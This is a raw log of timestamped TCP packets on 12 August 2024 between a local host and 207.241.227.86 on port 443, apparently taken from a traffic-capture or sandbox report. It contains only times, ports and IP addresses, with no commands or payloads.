                            Aug 12, 2024 11:37:06.444567919 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.444613934 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.444618940 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.444658995 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.445528030 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.445547104 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.445595026 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.445601940 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.445637941 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.494198084 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.494221926 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.494596958 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.494609118 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.494672060 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.506314993 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.506335020 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.506449938 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.506467104 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.506756067 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.531728029 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.531748056 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.531814098 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.531829119 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.531842947 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.531879902 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.532659054 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.532677889 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.532744884 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.532752991 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.532856941 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.532856941 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.533452988 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.533472061 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.533596039 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.533605099 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.533653021 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.534411907 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.534431934 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.534586906 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.534604073 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.534679890 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.535331964 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.535350084 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.535398006 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.535406113 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.535437107 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.535681963 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.536380053 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.536397934 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.536489964 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.536503077 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.536760092 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.589567900 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.589590073 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.589659929 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.589675903 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.589734077 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.589735031 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.596925020 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.596982956 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.597349882 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.597364902 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.597433090 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.622530937 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.622601986 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.622834921 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.622834921 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.622858047 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.622940063 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.624015093 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.624070883 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.624475002 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.624475002 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.624499083 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.624547005 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.624555111 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.624586105 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.624636889 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.624680042 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.624680042 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.624690056 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.624757051 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.624757051 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.625446081 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.625554085 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.625556946 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.625581980 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.625658989 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.625658989 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.626360893 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.626403093 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.626487970 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.626487970 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.626497984 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.626956940 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.627276897 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.627321959 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.627353907 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.627363920 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.627382994 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.627439976 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.680311918 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.680339098 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.680583954 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.680609941 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.680762053 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.687076092 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.687093973 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.687246084 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.687266111 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.687333107 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.714574099 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.714591026 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.714701891 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.714725018 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.714921951 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.715086937 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.715102911 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.715205908 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.715217113 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.715339899 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.716322899 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.716344118 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.716439009 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.716439009 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.716450930 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.716501951 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.717358112 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.717379093 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.717509985 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.717509985 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.717523098 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.717667103 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.717899084 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.717922926 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.717984915 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.717984915 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.717994928 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.718046904 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.718908072 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.718923092 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.719031096 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.719041109 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.719115019 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.771576881 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.771627903 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.771853924 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.771853924 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.771879911 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.771946907 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.778172970 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.778214931 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.778266907 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.778290987 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.778305054 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.778477907 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.805370092 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.805424929 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.805695057 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.805720091 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.805952072 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.805985928 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.806041956 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.806107044 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.806107998 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.806118011 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.806380987 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.807137966 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.807182074 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.807218075 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.807230949 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.807368994 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.807368994 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.808115959 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.808139086 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.808204889 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.808214903 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.808382988 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.808770895 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.808794022 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.808911085 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.808911085 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.808919907 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.809009075 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.809770107 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.809788942 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.809854984 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.809864998 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.809911966 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.862204075 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.862253904 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.862420082 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.862420082 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.862446070 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.862499952 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.868906975 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.868971109 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.869039059 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.869062901 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.869128942 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.869128942 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.896130085 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.896178007 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.896250963 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.896261930 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.896440029 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.896440029 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.897171974 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.897217035 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.897299051 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.897299051 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.897305012 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.897367001 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.898261070 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.898350000 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.898411036 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.898411036 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.898417950 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.898519993 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.899100065 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.899138927 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.899171114 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.899175882 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.899454117 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.899454117 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.900006056 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.900043964 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.900099993 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.900099993 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.900105953 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.900166035 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.900770903 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.900811911 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.900836945 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.900841951 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.900882959 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.900882959 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.952943087 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.952972889 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.953085899 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.953110933 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.953169107 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.959508896 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.959537983 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.959616899 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.959639072 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.959702969 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.987082958 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.987106085 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.987306118 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.987324953 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.987392902 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.987653017 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.987670898 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.987900019 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.987907887 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.987960100 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.988406897 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.988428116 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.988497972 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.988506079 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.988559961 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.989880085 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.989903927 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.989955902 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.989964008 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.990021944 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.990021944 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.990473986 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.990494967 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.990539074 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.990545988 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.990654945 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.990654945 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.991414070 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.991441965 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.991473913 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.991481066 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:06.991533041 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:06.991533041 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:07.043617010 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:07.043647051 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:07.043701887 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:07.043714046 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:07.043781996 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:07.043781996 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:07.050219059 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
